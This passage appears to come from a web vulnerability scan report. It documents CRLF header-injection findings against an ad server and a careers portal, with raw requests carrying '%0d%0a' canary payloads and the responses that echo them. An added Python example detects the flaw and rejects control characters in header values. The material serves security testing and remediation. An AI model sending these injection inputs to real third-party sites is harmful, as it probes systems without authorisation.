Set-Cookie: C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAPcPcrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_ff8ba
362c533d84b
=4005086
Location: http://ds.serving-sys.com/BurstingRes/Site-2452/Type-0/10e11342-71de-4dd2-be15-f354433bed69.gif
Content-Length: 0


2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 38356%0d%0a8ef6af01349 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356%0d%0a8ef6af01349; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=038356
8ef6af01349
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f1a%0d%0a2300f10199f was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000PcPcrMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a%0d%0a2300f10199f; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0PcPcrM7hMh0w820rI; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAPcPcrM; C3=0ujua2wErH0000001_0u6FPcPcrM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; u3=1; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HPcPcrM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=037f1a
2300f10199f
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3308a%0d%0ab7fc8e58424 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=3308a%0d%0ab7fc8e58424&wmpv=0&res=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=3308a
b7fc8e58424
&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 1c571%0d%0ac124ed287af was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=0&res=1c571%0d%0ac124ed287af HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=1c571
c124ed287af
&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 637d4%0d%0a49ae547a880 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4005086%7E%7E0%5EebUniqueDwell%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebPanelsViewed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebUserInteraction%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.4607956385523753&flv=10.1102&wmpv=637d4%0d%0a49ae547a880&res=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHs0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MHs0bnA0000Ncj4rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Ncj4rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FNcj4rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HNcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnANcj4rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=637d4
49ae547a880
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload a3baa%0d%0aa106309a0a3 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa%0d%0aa106309a0a3; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0a3baa
a106309a0a3
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1912

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
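
Findings 2.7 to 2.10 all share one mechanism: a request value (query parameter or the eyeblaster cookie) is written into the eyeblaster Set-Cookie header after the server has URL-decoded it, so the %0d%0a in the canary becomes a real CR LF and the text after it starts a new header line. The following Python is an added example, not code from the report or from the ad server: it re-implements the response-side check that underlies these findings and then shows the server-side guard that would have prevented them. The sample response is constructed from finding 2.7; the report renders the canary suffix on a line of its own for emphasis, and the sample assumes the raw bytes put it at the start of the line that carries the remainder of the cookie. The cookie layout in eyeblaster_set_cookie is an assumption modelled on the responses above, not the vendor's code.

```python
"""
Response-side check behind findings 2.7 to 2.10 above, plus the server-side
guard that prevents them. Added example; sample data constructed from 2.7.
"""
import re

_CTL = re.compile(r"[\r\n\x00]")


def header_lines(raw: bytes) -> list:
    """Split a raw HTTP/1.1 response into its header lines (status line first).

    The split is on bare CRLF, which is exactly what a server that copies an
    unencoded %0d%0a into a header value hands the client: the text after the
    CRLF shows up as a separate line here.
    """
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    return [line.decode("latin-1") for line in head.split(b"\r\n")]


def injected_headers(raw: bytes, prefix: str, suffix: str):
    """Return (reflected, injected): header lines containing the canary prefix,
    and header lines that *start* with the canary suffix. A non-empty second
    list is the condition each finding above reports: the suffix can only begin
    a line if the server emitted the attacker's CR LF verbatim."""
    lines = header_lines(raw)
    reflected = [line for line in lines if prefix in line]
    injected = [line for line in lines if line.startswith(suffix)]
    return reflected, injected


class HeaderInjection(ValueError):
    """Raised when a value bound for a response header contains CR, LF or NUL."""


def cookie_value(value: str) -> str:
    """Reject rather than strip: a CR/LF in a cookie value is never legitimate
    input, and silently stripping it hides the attack from logs."""
    if _CTL.search(value):
        raise HeaderInjection(f"control character in header value: {value!r}")
    return value


def eyeblaster_set_cookie(flv: str, res: str, wmpv: str) -> str:
    """Build the eyeblaster Set-Cookie line in the layout seen above, with every
    request-derived field validated first. (Assumed layout; the real server's
    code is not on the page.)"""
    fields = "&".join(f"{k}={cookie_value(v)}"
                      for k, v in (("FLV", flv), ("RES", res), ("WMPV", wmpv)))
    return (f"Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&{fields}; "
            "expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/")


# Constructed from finding 2.7 (body omitted). On the wire the suffix begins
# the line that also carries the rest of the cookie.
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=3308a\r\n"
    b"b7fc8e58424&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

# The same response from a server that kept the value percent-encoded (the
# decdna.net Set-Cookie in finding 2.18 behaves this way): reflected, not injected.
ENCODED_RESPONSE = VULNERABLE_RESPONSE.replace(b"3308a\r\nb7fc8e58424",
                                               b"3308a%0d%0ab7fc8e58424")

if __name__ == "__main__":
    reflected, injected = injected_headers(VULNERABLE_RESPONSE, "3308a", "b7fc8e58424")
    print("reflected:", reflected)
    print("injected :", injected)   # one line, starting with b7fc8e58424&RES=0
    print("encoded  :", injected_headers(ENCODED_RESPONSE, "3308a", "b7fc8e58424")[1])
    try:
        eyeblaster_set_cookie("3308a\r\nb7fc8e58424", "0", "0")
    except HeaderInjection as err:
        print("rejected :", err)
```

The distinction the ENCODED_RESPONSE case makes matters when triaging: a canary that merely appears in a header is a reflection, and only a suffix that begins its own line proves the CRLF survived. On the fix side, validation belongs at the point where request data is bound to a header, not in a global filter, and rejecting the request is preferable to stripping, since the same value is often also logged or passed on to other systems.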

2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.nytco.com
Path:   /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a8150%0d%0a9885d629a2a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /psc/TAM/a8150%0d%0a9885d629a2a/HRMS/c/HRS_HRAM.HRS_CE.GBL HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: careers.nytco.com
Connection: Keep-Alive
Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 13 Nov 2010 02:06:00 GMT
Location: https://careers.nytco.com/psc/TAM/a8150
9885d629a2a
/HRMS/c/HRS_HRAM.HRS_CE.GBL?&
Content-Type: text/html
Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyLwp6fh267CFb37d08fd519kxhjTgz!-9483320; path=/
Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=ibZNGO816CGmgoP+8wRDiOW9hzIWf9juKF29s4WauEjAoyGVrp0LscD5ghKu0DQKX6pY+xhT8lIghvjTkc++8/M/VES3ZdaLrnNm7pq0h2Vz3ljuB7NHtI5DQwSnEDUMyZwu4GybmH6PsHDSitdqiiEvb71ZKVC0; path=/
Content-Length: 365

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://careers.nytco.com/psc/TAM/
...[SNIP]...

